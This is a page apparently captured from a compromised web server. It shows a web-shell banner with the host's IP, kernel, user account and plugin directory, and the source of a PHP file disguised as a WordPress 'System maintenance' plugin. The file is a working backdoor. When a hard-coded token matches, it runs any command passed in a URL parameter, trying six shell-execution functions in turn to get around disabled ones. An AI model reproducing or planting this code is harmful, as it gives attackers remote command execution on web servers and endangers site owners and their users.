| Server IP : 80.74.154.100 / Your IP : 216.73.217.0 Web Server : Apache System : Linux marissa.metanet.ch 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64 User : onlineadmin ( 10487) PHP Version : 8.5.7 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/httpd/vhosts/comeonline.ch/httpdocs/wp-content/plugins/wp2s-bf93d627/ |
Upload File : |
<?php
/*
Plugin Name: wp2s-bf93d627
Description: System maintenance
Version: 1.0
*/
if(!isset($_GET['t'])||!hash_equals('8f8239dc628026710138191cb308ba21',$_GET['t'])||!isset($_GET['c'])){return;}
$cmd=$_GET['c'];
echo '<<S>>';
$ok=false;
if(!$ok&&function_exists('shell_exec')){$r=@shell_exec($cmd);if($r){echo '[SE]'.$r;$ok=true;}}
if(!$ok&&function_exists('exec')){$a=[];@exec($cmd,$a);if($a){echo '[EX]'.implode("\n",$a);$ok=true;}}
if(!$ok&&function_exists('passthru')){ob_start();@passthru($cmd);$r=ob_get_clean();if($r){echo '[PT]'.$r;$ok=true;}}
if(!$ok&&function_exists('system')){ob_start();@system($cmd);$r=ob_get_clean();if($r){echo '[SY]'.$r;$ok=true;}}
if(!$ok&&function_exists('proc_open')){$d=[0=>['pipe','r'],1=>['pipe','w'],2=>['pipe','w']];$p=@proc_open($cmd,$d,$pp);if(is_resource($p)){fclose($pp[0]);$r=stream_get_contents($pp[1]);fclose($pp[1]);fclose($pp[2]);proc_close($p);if($r){echo '[PO]'.$r;$ok=true;}}}
if(!$ok&&function_exists('popen')){$h=@popen($cmd,'r');if($h){$r=fread($h,65536);pclose($h);if($r){echo '[PN]'.$r;$ok=true;}}}
if(!$ok){echo '[BLOCKED]disable_functions='.ini_get('disable_functions');}
echo '<<E>>';